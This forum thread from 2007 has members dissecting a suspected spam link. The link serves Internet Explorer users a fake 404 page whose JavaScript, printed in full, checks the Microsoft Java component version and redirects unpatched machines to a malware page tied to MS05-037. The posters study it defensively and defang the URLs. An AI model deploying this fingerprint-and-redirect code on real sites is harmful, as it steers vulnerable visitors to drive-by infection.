Nikkytas Posted January 10, 2007 Posted January 10, 2007 Friend of mine tell me about some statistic information available at this page: http:/www.abetterstart.com/c/2000/counter21.php However, every time i hit it, it says 404 error, while my friend getting content page. I don't think i doing anything wrong, but damn... I just can't figure what can be done to get this page visible :(((( Quote
mubix Posted January 10, 2007 Posted January 10, 2007 Friend of mine tell me about some statistic information available at this page: http:/www.abetterstart.com/c/2000/counter21.php However, every time i hit it, it says 404 error, while my friend getting content page. I don't think i doing anything wrong, but damn... I just can't figure what can be done to get this page visible :(((( I have taken one of the "/" out of your post until I can determine if this is spam, something else, or completely legit. Quote
Sparda Posted January 10, 2007 Posted January 10, 2007 It's definitively spam, that isn't the server genuine 404 error. Set your user agent to IE and it returns (what appears to be) a JavaScript exploit for IE, the code is shown below (but not all the code, there is more if you follow the JavaScript URLs, you will eventually end up at this page:http:/www.abetterstart.com/c/2000/counter21.php?j=1, could be a exploit payload): <HTML> <HEAD> <TITLE>404 error - Document Not Found</TITLE> </HEAD> <STYLE> BODY { BEHAVIOR: url(#default#clientCaps) } </STYLE> <BODY id=testing> <script language='javascript'> var i,l,v; num = 3; s = '{08B0E5C0-4FCB-11CF-AAA5-00401C608500}'; l = testing.isComponentInstalled(s,'ComponentID'); v = testing.getComponentVersion(s,'ComponentID'); if (l == true) { x = v.split(','); if ( (x[0]!=0) && (x[2]<3810) ) { num = 1; } } c = 'http://www.abetterstart.com/c/2000/'+'counter21.php'+'?b='+num; window.location = c; </script> </BODY> </HTML> Well... this is either spam or the guy asking was smart enough to use Firefox and not get his box owned Quote
mubix Posted January 10, 2007 Posted January 10, 2007 That isn't exploit code, it's just checking if Java is installed, a specific version and allowed. Then it hops you to the next site that infects your computer with spyware. Just ran it through a sandbox. I took your URL out as well. I don't want people clicking on it on accident. It's Vako's call if he wants it gone. Quote
Sparda Posted January 10, 2007 Posted January 10, 2007 So the Java app brakes out of the Java VM? Quote
mubix Posted January 10, 2007 Posted January 10, 2007 So the Java app brakes out of the Java VM? If you can find out what version of Java 3810 is (3810 is the VM version) then we could start looking for what exploits work against versions lower that in: Quote
mubix Posted January 10, 2007 Posted January 10, 2007 Code explained: Initialize Javascript and declare variables: (no big deal) <script language='javascript'> var i,l,v; num = 3; This is the register entry for Internet Explorer for the Java component. Run regedit and do a search just for the alphanumerics in the brackets: s = '{08B0E5C0-4FCB-11CF-AAA5-00401C608500}'; You should find it at: HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupClsidFeature Uses a boolen test to verify that the Java component exists: l = testing.isComponentInstalled(s,'ComponentID'); Saves the whole value of the registry key to the value 'v': v = testing.getComponentVersion(s,'ComponentID'); Mine looked like this -> {08B0E5C0-4FCB-11CF-AAA5-00401C608500}!5,0,3200,0 This is where it starts checking for what it wants: Is the component installed? If yes, continue: if (l == true) { Split up the 'v' variable using the delimiter ",": x = v.split(','); If there is a version and it is less than 3810 then change "num" to 1; if ( (x[0]!=0) && (x[2]<3810) ) { num = 1; Send the user to a specific site based on the results and value of "num" c = 'http://www.abetterstart.com/c/2000/'+'counter21.php'+'?b='+num; window.location = c; So, people who are "vulnerable" would go to: http:/www.abetterstart.com/v/200/counter21.php?b=1 And those who aren't go to: http:/www.abetterstart.com/v/200/counter21.php?b=3 again, with the "/" taken out. Quote
VaKo Posted January 10, 2007 Posted January 10, 2007 It's Vako's call if he wants it gone. Nope, this is perfect. Instead of idle threats against the spammer, you've actually gone threw what its trying to do. Net result: We all learned a little more and the spammer is exposed. Quote
cooper Posted January 11, 2007 Posted January 11, 2007 Which version of Java did you have installed on that sandbox? Also, how did you determine that it's in fact Java? Common knowledge, or something in the key that gave it away? Quote
mubix Posted January 11, 2007 Posted January 11, 2007 Which version of Java did you have installed on that sandbox?Also, how did you determine that it's in fact Java? Common knowledge, or something in the key that gave it away? Google Quote
cooper Posted January 11, 2007 Posted January 11, 2007 That was the tip I needed. They're testing to see if you're vulnerable to the problem in the JView Profiler which could allow remote code execution. Microsoft Advisory MS05-37: http://www.microsoft.com/technet/security/...n/MS05-037.mspx Secunia Advisory SA15891: http://secunia.com/advisories/15891/ Version 3810 specifically fixes this particular problem, which started out with this: http://www.microsoft.com/technet/security/...ory/903144.mspx The flaw was originally discovered in july 2005 so if you didn't update your system since then... Well, in that case you kinda deserve to get hacked, really. Quote
Sparda Posted January 11, 2007 Posted January 11, 2007 You don't really need to update widows for this attack to fail.. you just need to not use IE. Quote
mubix Posted January 11, 2007 Posted January 11, 2007 Yes, but the question is not how many of "US" this attack will fail against. It's how many of our mothers and fathers and grandparents this attack will fail against. How many organizations use IE because of policy, and not allow installation of Firefox or Opera? Statistics is a scary thing when you start thinking global. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.